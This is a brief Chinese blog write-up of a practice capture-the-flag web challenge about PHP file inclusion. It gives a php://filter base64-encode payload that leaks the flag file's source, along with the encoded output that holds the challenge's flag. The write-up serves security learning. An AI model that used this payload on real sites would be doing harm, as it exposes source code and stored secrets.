攻防世界28-fileinclude-CTFWeb
攻防世界28-fileinclude-CTFWeb
文件包含,看源代码
lan不为空则include$lan.php,得到flag在flag.php里,我们要让利用这个漏洞输出源码
php://filter/read/convert.base64-encode/resource=flag
PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezY1bzQxNzIxZGJlZGViMTFkMTgwYTQ1ZGE3MTViY2FhfSI7DQo/Pg==
base64解码即可
- 感谢你赐予我前进的力量
赞赏者名单
因为你们的支持让我意识到写文章的价值🙏
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 Matriy
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果